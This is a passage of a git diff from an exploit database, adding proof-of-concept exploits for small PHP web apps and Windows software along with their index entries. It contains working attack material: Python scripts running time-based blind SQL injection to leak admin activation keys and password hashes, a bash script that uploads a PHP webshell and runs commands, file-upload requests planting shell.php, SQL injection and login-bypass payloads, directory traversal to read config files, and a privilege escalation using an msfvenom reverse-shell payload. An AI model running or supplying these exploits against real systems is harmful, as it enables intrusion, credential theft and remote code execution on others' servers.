", "\n") +print(clean) +print("You have a webshell @ http://" + ip + "/" + filename) \ No newline at end of file diff --git a/exploits/php/webapps/48542.txt b/exploits/php/webapps/48542.txt new file mode 100644 index 000000000..227ef4629 --- /dev/null +++ b/exploits/php/webapps/48542.txt @@ -0,0 +1,20 @@ +# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) +# Date: 2020-06-02 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/hostel-management-system/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210 +# Version: 2.0 +# Tested on: Windows 10 - Wamp Server + +--Vulnerable file /full-profile.php + +--Vulnerable code; + $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'"); + + Id parameter's value is going into sql query directly! + +--Proof Of Concept + + sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" + OR + http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error \ No newline at end of file diff --git a/exploits/php/webapps/48544.txt b/exploits/php/webapps/48544.txt new file mode 100644 index 000000000..812ca9acd --- /dev/null +++ b/exploits/php/webapps/48544.txt @@ -0,0 +1,62 @@ +# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution +# Google Dork: N/A +# Date: 2020-06-02 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +# Vulnerability: +Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution +(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. +# vulnerable file : manage_website.php +# Details: +login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. +change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. +path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php + +# Proof of Concept: +http://localhost/source%20code/manage_website.php + +POST /source%20code/manage_website.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------135192786613366 +Content-Length: 2539 +Referer: http://localhost/source%20code/manage_website.php +Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------58631544014332: undefined +Content-Disposition: form-data; name="title" + +-----------------------------58631544014332 +Content-Disposition: form-data; name="short_title" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="footer" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_code" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_symbol" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="old_website_image" + +logo for hospital system.jpg +-----------------------------58631544014332 +Content-Disposition: form-data; name="website_image"; filename="shell.php" +Content-Type: application/octet-stream + + \ No newline at end of file diff --git a/exploits/php/webapps/48545.py b/exploits/php/webapps/48545.py new file mode 100755 index 000000000..71aa847f1 --- /dev/null +++ b/exploits/php/webapps/48545.py @@ -0,0 +1,34 @@ +# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: N/A + +# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database. +# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash. +# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]` + +import requests, time, string + +user = raw_input("Please enter your username: \n") +password = raw_input("Please enter your password: \n") +URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n") + +s = requests.Session() +data = {'login-username': (None, user), 'login-password':(None, password)} +s.post(url = URL + "login.php", files = data) +dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits +final = "" +while True: + for x in dictionary: + payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -' + r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload) + if int(r.elapsed.total_seconds()) > 4: + final += x + print "Leaking contents of admin hash: " + final + break + else: + pass \ No newline at end of file diff --git a/exploits/php/webapps/48546.txt b/exploits/php/webapps/48546.txt new file mode 100644 index 000000000..1543305fe --- /dev/null +++ b/exploits/php/webapps/48546.txt @@ -0,0 +1,76 @@ +# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection +# Google Dork: inurl:/eotools_share/ +# Date: 2020-06-03 +# Exploit Author: TSAR +# Vendor Homepage: http://www.oriolespinal.es/eowd +# Software Link: http://www.oriolespinal.es/eotools +# Version: ALL VERSION UP TO LATEST +# Tested on: MACOS 10.11.2 +# CVE : NOt YET + +[1]########### SQl INJECTION ########### + +Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable + +http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10-- + + +[2]########### SQl INJECTION ########### + + + + +Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable: + + +POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1 +Host: victim.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556 +Content-Length: 740 +Connection: close +Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada + +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="userfile"; filename="shell.php" +Content-Type: image/png + +PNG; +********************************/ +********************************/ +GIF89a; +********************/ +********************/ +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="categoria" + +pdfs +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="descripcion" + +123 +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="submit" + +upload +-----------------------------165073870416097602871919119556-- + + +the shell path is: + +http://victim.com/path/eotools_files/files/shell.php + + +========================================================== + +========================================================== + +Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r + [ALL MUSLIM AND ARAB HACKERS] + +========================================================== \ No newline at end of file diff --git a/exploits/php/webapps/48547.txt b/exploits/php/webapps/48547.txt new file mode 100644 index 000000000..18d079f01 --- /dev/null +++ b/exploits/php/webapps/48547.txt @@ -0,0 +1,62 @@ +# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload +# Google Dork: N/A +# Date: 2020-06-02 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +# Vulnerability: +Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution +(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. +# vulnerable file : manage_website.php +# Details: +login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. +change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. +path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php + +# Proof of Concept: +http://localhost/source%20code/manage_website.php + +POST /source%20code/manage_website.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------135192786613366 +Content-Length: 2539 +Referer: http://localhost/source%20code/manage_website.php +Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------58631544014332: undefined +Content-Disposition: form-data; name="title" + +-----------------------------58631544014332 +Content-Disposition: form-data; name="short_title" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="footer" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_code" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_symbol" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="old_website_image" + +logo for hospital system.jpg +-----------------------------58631544014332 +Content-Disposition: form-data; name="website_image"; filename="shell.php" +Content-Type: application/octet-stream + + \ No newline at end of file diff --git a/exploits/php/webapps/48548.txt b/exploits/php/webapps/48548.txt new file mode 100644 index 000000000..96e1c1205 --- /dev/null +++ b/exploits/php/webapps/48548.txt @@ -0,0 +1,99 @@ +# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48550.txt b/exploits/php/webapps/48550.txt new file mode 100644 index 000000000..243053d2c --- /dev/null +++ b/exploits/php/webapps/48550.txt @@ -0,0 +1,29 @@ +# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: CVE-2020-13795 + +A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data. + +For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: + `/var/www/html/navigate/private/1/templates/` + +My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). + +My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php` + +Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example: + +Traversal payload: +`../../../navigate.php` + +PHP Code execution payload: +``` + +``` \ No newline at end of file diff --git a/exploits/php/webapps/48552.sh b/exploits/php/webapps/48552.sh new file mode 100755 index 000000000..1097eaa66 --- /dev/null +++ b/exploits/php/webapps/48552.sh @@ -0,0 +1,52 @@ +# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution +# Google Dork: N/A +# Date: 2020-05-31 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10 / Xampp Server and Wamp Server +# CVE : N/A +# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System + +#!/bin/bash +echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution" +echo "# Author ---> Selim Enes Karaduman" +echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND" +while getopts u:m:p:c: par +do +case $par in +u) url=$OPTARG ;; +m) mnum=$OPTARG ;; +p) passwd=$OPTARG ;; +c) command=$OPTARG ;; +esac +done +sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2) +url_for_req=$(echo $url | cut -d "/" -f 3) +function upload(){ +curl -i -s -k -X $'POST' \ + -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \ + -b $"$sess" \ + --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \ + $"$url/user/marriage-reg-form.php" >>/dev/null +} +upload + +#Execute the given command +shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '') + + +check=$(echo $command | grep " " | wc -l) +if [[ $check > 0 ]] +then +fixed_command=$(echo $command | sed 's/ /%20/g') +curl -s "$url/user/images/$shell_file?cmd=$fixed_command" +else +curl -s "$url/user/images/$shell_file?cmd=$command" +fi + + +echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS" +echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded" +shift $((OPTIND-1)) \ No newline at end of file diff --git a/exploits/windows/local/48543.txt b/exploits/windows/local/48543.txt new file mode 100644 index 000000000..3972d1db3 --- /dev/null +++ b/exploits/windows/local/48543.txt @@ -0,0 +1,53 @@ +# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path +# Author: Gobinathan L +# Date: 2020-06-03 +# Vendor Homepage: https://www.iobit.com +# Software Link: https://www.iobit.com/en/advanceduninstaller.php +# Version : 9.5.0.15 +# Tested on: Windows 10 64bit(EN) + +About Unquoted Service Path : +============================== + +When a service is created whose executable path contains spaces and isn't enclosed within quotes, +leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. +(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). + +Steps to recreate : +============================= + +1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] +2. The Vulnerable Service would Show up. +3. Check the Service Permissions by typing [ sc qc IObitUnSvr ] +4. The command would return.. + + C:\>sc qc IObitUnSvr + [SC] QueryServiceConfig SUCCESS + SERVICE_NAME: IObitUnSvr + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : IObit Uninstaller Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" +6. Now create a Payload with msfvenom or other tools and name it to IObit.exe +7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory. +8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory. +9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ] +10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. + +During my testing : + +Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe +Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ] + +# Disclaimer : +========================= +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. +The author prohibits any malicious use of security related information or exploits by the author or elsewhere. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a73d057de..ca945761d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11084,6 +11084,7 @@ id,file,description,date,author,type,platform,port 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows, 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows, +48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42768,3 +42769,19 @@ id,file,description,date,author,type,platform,port 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php, 48539,exploits/php/webapps/48539.txt,"OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)",2020-06-02,"Kailash Bohara",webapps,php, +48541,exploits/hardware/webapps/48541.py,"AirControl 1.4.2 - PreAuth Remote Code Execution",2020-06-04,0xd0ff9,webapps,hardware, +48542,exploits/php/webapps/48542.txt,"Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)",2020-06-04,Enesdex,webapps,php, +48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php, +48545,exploits/php/webapps/48545.py,"Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)",2020-06-04,"Gus Ralph",webapps,php, +48546,exploits/php/webapps/48546.txt,"Oriol Espinal CMS 1.0 - 'id' SQL Injection",2020-06-04,TSAR,webapps,php, +48547,exploits/php/webapps/48547.txt,"Clinic Management System 1.0 - Authenticated Arbitrary File Upload",2020-06-04,BKpatron,webapps,php, +48548,exploits/php/webapps/48548.txt,"Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)",2020-06-04,"Gus Ralph",webapps,php, +48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java, +48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php, +48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware, +48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php, +48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, +48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware, +48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware, +48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, +48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, From d0531a5e12527acac56c8c13c4b2fbe056850322 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 6 Jun 2020 05:01:55 +0000 Subject: [PATCH 08/17] DB: 2020-06-06 2 changes to exploits/shellcodes Online Course Registration 1.0 - Authentication Bypass Online-Exam-System 2015 - 'feedback' SQL Injection --- exploits/php/webapps/48559.txt | 40 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/48560.py | 34 +++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 76 insertions(+) create mode 100644 exploits/php/webapps/48559.txt create mode 100755 exploits/php/webapps/48560.py diff --git a/exploits/php/webapps/48559.txt b/exploits/php/webapps/48559.txt new file mode 100644 index 000000000..1cac98d7f --- /dev/null +++ b/exploits/php/webapps/48559.txt @@ -0,0 +1,40 @@ +# Exploit Title: Online Course Registration 1.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-06-05 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A +# my website: bkpatron.com + +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : admin/index.php +# Parameter & Payload: '=''or' +# Proof of Concept: + +http://localhost/Online%20Course%20Registration/admin/index.php + +POST /Online%20Course%20Registration/admin/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 61 +Referer: http://localhost/Online%20Course%20Registration/admin/index.php +Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined + +HTTP/1.1 302 Found +Date: Thu, 04 Jun 2020 20:04:27 GMT +Server: Apache/2.4.39 (Win64) PHP/7.3.5 +X-Powered-By: PHP/7.3.5 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +location: http://localhost/Online Course Registration/admin/change-password.php \ No newline at end of file diff --git a/exploits/php/webapps/48560.py b/exploits/php/webapps/48560.py new file mode 100755 index 000000000..7e9fce954 --- /dev/null +++ b/exploits/php/webapps/48560.py @@ -0,0 +1,34 @@ +# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://github.com/sunnygkp10/ +# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git +# Affected Version: 2015 +# Tested on: Ubuntu +# CVE : N/A + +import requests, string, time +from sys import stdout + +URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n") + +payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^" +payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -" +so_far = hash = "" +while True: + for i in string.digits + string.ascii_lowercase: + so_far = hash + i + payload_to_send = payload + str(so_far) + payload2 + data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send} + start = time.time() + r = requests.post(URL + "feed.php", data = data) + request_time = time.time() - start + if request_time > 5: + hash += i + stdout.write(i) + stdout.flush() + break + if len(hash) > 31: + stdout.write("\n") + print "Hash found: " + hash + break \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ca945761d..1cf93bd8b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware, 48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, +48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php, +48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, From 590364ca2a0a3e3251b312f456260d3781fc13db Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 Jun 2020 05:02:04 +0000 Subject: [PATCH 09/17] DB: 2020-06-09 4 changes to exploits/shellcodes Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection --- exploits/hardware/webapps/48561.txt | 68 ++++++++++++++++++++++ exploits/php/webapps/48562.txt | 23 ++++++++ exploits/windows/local/48563.py | 70 ++++++++++++++++++++++ exploits/windows/local/48564.py | 90 +++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 255 insertions(+) create mode 100644 exploits/hardware/webapps/48561.txt create mode 100644 exploits/php/webapps/48562.txt create mode 100755 exploits/windows/local/48563.py create mode 100755 exploits/windows/local/48564.py diff --git a/exploits/hardware/webapps/48561.txt b/exploits/hardware/webapps/48561.txt new file mode 100644 index 